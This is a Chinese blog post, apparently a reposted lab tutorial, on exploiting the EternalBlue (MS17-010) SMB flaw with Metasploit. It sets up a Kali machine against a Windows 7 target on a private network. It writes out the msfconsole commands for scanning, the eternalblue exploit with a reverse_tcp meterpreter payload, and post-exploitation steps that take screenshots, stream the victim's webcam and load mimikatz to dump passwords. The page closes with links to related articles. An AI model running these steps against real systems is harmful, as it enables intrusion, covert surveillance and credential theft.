永恒之蓝漏洞(EternalBlue)

最新推荐文章于 2024-06-02 16:50:45 发布
最新推荐文章于 2024-06-02 16:50:45 发布
阅读量1.9k 收藏 4
点赞数 1
分类专栏: 安全漏洞 文章标签: 安全漏洞
原文链接:https://blog.csdn.net/qq_36197704/article/details/82458557?depth_1-utm_source=distribute.pc_relevant.none-task&utm_source=distribute.pc_relevant.none-task
版权

       今天就跟大家分享下刚刚学习到利用MSF框架快速搞定“MS017-010”漏洞。其实我们这里所说的使用MSF 实现 “永恒之蓝”的快速攻击,就是利用Metasploit中针对ms17-101漏洞的攻击载荷进行攻击获取主机控制权限。“永恒之蓝”的原理主要是扫描所有开放445文件共享端口的Windows机器。

445端口简介:

       445端口是一个毁誉参半的端口,有了它我们可以在局域网中轻松访问各种共享文件夹或共享打印机,但也正是因为有了它,黑客们才有了可乘之机,他们能通过该端口偷偷共享你的硬盘,甚至会在悄无声息中将你的硬盘格式化掉! 2017年10月,由于病毒"坏兔子"来袭,国家互联网应急中心等安全机构建议用户及时关闭计算机以及网络设备上的445和139端口 。

准备:

  1. Kali系统  版本:2.0   IP:192.168.0.129
  2. Win7系统           IP:192.168.0.130   开放端口:445
  3. MSF框架版本:4.14.17版本以上
  4. 安装更新metasploit 

实战攻击:

Step1:查看MSF框架版本

在终端输入msfconsole

Step2: 安装更新metasploit

终端输入apt-get  install metasploit-framework

Step3:漏洞模块路经查询

在终端输入:search ms17-010

Step4:加载扫描模块

use auxiliary/scanner/smb/smb_ms17_010

show options

set rhosts 192.168.0.130       (靶机的IP)

exploit

 

Step5:加载攻击模块并配置参数

use exploit/windows/smb/ms17_010_eternalblue

set payload windows/x64/meterpreter/reverse_tcp

show options

set rhost 192.168.0.130 (靶机的IP)

set lhost 192.168.0.129 (发起攻击的主机IP)

set lport 443       (监听的端口)

 

Step6:发起攻击,成功会反弹shell

输入run或者exploit

 

Meterpreter功能展现

1.捕捉桌面:

meterpreter >screenshot

2.视屏开启

meterpreter > webcam_stream

kali会自动打开浏览器播放被攻击电脑的摄像头,被攻击者的摄像头也会亮起来

 

3.获取系统管理密码

Step1:载入mimikatz

meterpreter > load mimikatz

Step2:使用命令wdigest获取密码

Meterpreter功能有很多,这里就不一一的示范了,有兴趣的可以自己去测试下。

NoobMaster--CISSP
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
永恒之蓝(ms17010)漏洞检测工具
04-19
在司徒西大神易语言ms17010漏洞检测源码上稍做修改,并做成了批处理,可以单机也可以网段批量检测永恒之蓝漏洞。优点是体积小,扫描准确。缺点是扫描速度较慢。 使用方法: 此程序为易语言开发,如被误报病毒,可以...
win2012R2永恒之蓝安全补丁.zip
05-12
永恒之蓝漏洞源自微软的SMB(Server Message Block)服务,这是一个允许网络上的计算机共享文件、打印机和网络资源的协议。该漏洞(CVE-2017-0144和CVE-2017-0145)允许远程代码执行,使得攻击者无需用户交互即可...
ms17-010(永恒之蓝漏洞复现与处理
diaobusi的博客
06-05 1万+
ms17_010 是一种操作系统漏洞,仅影响 Windows 系统中的 SMBv1 服务。这个漏洞是由于 SMBv1 内核函数中的缓冲区溢出而导致的。攻击者可以通过该漏洞控制目标系统,并执行任意代码。这个漏洞通过 445 文件共享端口进行利用,一旦攻击者成功利用该漏洞,就可以在目标主机上植入各种恶意软件,如勒索软件。最近出现的 WannaCry 勒索软件就使用 ms17_010 漏洞来传播和植入勒索代码,将目标系统中的所有文件加密并威胁用户付款。
永恒之蓝漏洞
ZXT02的博客
12-21 953
仅限学习使用!!!
永恒之蓝 (EternalBlue) 漏洞利用原理详解
最新发布
volta_xu的博客
06-02 758
SMB(Server Message Block)协议是一种网络文件共享协议,主要用于文件和打印机共享。SMB协议允许客户端通过网络访问服务器上的文件、目录和其他资源。在Windows中,SMB协议是默认启用的,用于提供文件共享服务。
永恒之蓝漏洞利用攻击以及修复方法
Gjqhs的博客
12-12 6955
MS17-010(Eternal blue永恒之蓝漏洞利用+修复方法 前言 0x01 准备工作 0x02 漏洞利用 0x03 修复方案 总结 前言 提到操作系统漏洞,大家肯定听说过耳熟能详的永恒之蓝(MS17-010)了,他的爆发源于WannaCry勒索病毒的诞生。 该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的危险漏洞EternalBlue”(永恒之蓝)进行传播 。勒索病毒肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了.
永恒之蓝漏洞复现(ms17-010)
good good study
01-20 2万+
Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。
浅析ms17_010(永恒之蓝漏洞利用过程及防护措施
qq_24797991的博客
03-27 4030
永恒之蓝勒索病毒漏洞复现及防范
网安永恒之蓝检测工具
04-02
在网络安全领域,定期检查和修复永恒之蓝漏洞至关重要。由于该漏洞影响广泛,包括但不限于Windows XP、Windows Server 2003等老版本操作系统,因此对于未及时更新系统补丁的用户来说,风险尤其高。"网安永恒之蓝检测...
EternalBlue永恒之蓝渗透测试.html
03-02
永恒之蓝漏洞渗透测试
Windows漏洞 MS17-010 / EternalBlue永恒之蓝)工具-易语言
06-11
MS17-010 / EternalBlue永恒之蓝漏洞 检测工具 百度百科: https://baike.baidu.com/item/永恒之蓝 本源码 无调用 任何模块 测试环境: Microsoft Windows XP x86 Microsoft Windows Server 2003 x86 漏洞涉及 ...
网络安全-MS17-010漏洞-永恒之蓝
weixin_48137911的博客
02-14 3685
攻击主机上打开了目标机器的桌面,攻击成功,这个时候只要我把它原本的账户删了,不断电的情况下,我想干嘛干嘛,他就再也进不来了,除非断电,重装。这个漏洞呢,在win10是不可以的,win8也是不行滴,只有win7以及以下的电脑,才有这个漏洞,因为win7之后微软把他给修复了。账户已经建立了,试想一波,如果我是真正的入侵者,我都有你账户了,我进你系统不是轻轻松松,账户密码都是我自己设置的。.无论怎么输入都没用,因为这个账号已经被我删掉了,或者我想放什么恶意程序木马在里面,隐藏起来,他也不知道的呀~
ms17-010永恒之蓝漏洞利用,渗透同一局域网下的windows7
m0_63533079的博客
03-08 1834
利用window7存在的ms17-010漏洞进行复现演示
关于NSA的EternalBlue永恒之蓝) ms17-010漏洞利用
cnbluerain的博客
05-19 2万+
NSA的EternalBlue永恒之蓝) ms17-010 漏洞利用
CVE-2017-0144 EternalBlue永恒之蓝漏洞分析
子曰小玖的博客
04-08 6839
前言 EternalBlue永恒之蓝)据称是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的模块,由于其涉及漏洞的影响广泛性及利用稳定性,在被公开以后为破坏性巨大的勒索蠕虫 WannaCry所用而名噪一时。360威胁情报中心对于WannaCry的活动持续地进行着监控,我们看到的趋势是 WannaCry的感染量还在增加,说明作为蠕虫主要传播手段的EternalBlue相应的漏洞还大量存在...
永恒之蓝 MS17-010漏洞复现
MX的博客
10-07 3万+
永恒之蓝 MS17-010漏洞复现 文章目录永恒之蓝 MS17-010漏洞复现一:漏洞原理1:简介2:漏洞原理代码详解二:漏洞复现1:信息收集 一:漏洞原理 1:简介 永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码。 注:SMB服务的作用:该服务在Windows与UNIX系列OS之间搭起一座桥梁,让两者的资源可互通有无,S...
永恒之蓝漏洞利用及攻击
热门推荐
wwl012345的博客
04-20 9万+
一、基础知识介绍: 1.何为永恒之蓝永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎...
ms17-010-永恒之蓝漏洞
D_R_L_T的博客
12-12 1791
攻击机:192.168.11.231 被攻击机:192.168.11.22 第一步:更新MSF:msfupdate,查找smb_ms17_010.rb模块 cd /usr/share/metasploit-framework/modules/auxiliary/scanner/smb 第二步:连接postgresql数据库,不连接的话扫描的信息的信息无法入库。连接上后可
如何防范永恒之蓝漏洞
07-27
永恒之蓝漏洞EternalBlue)是一种影响微软Windows操作系统的漏洞,它被用于进行网络蠕虫攻击和远程代码执行。以下是一些防范永恒之蓝漏洞的建议措施: 1. 及时打补丁:安装并定期更新微软发布的安全补丁,包括...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值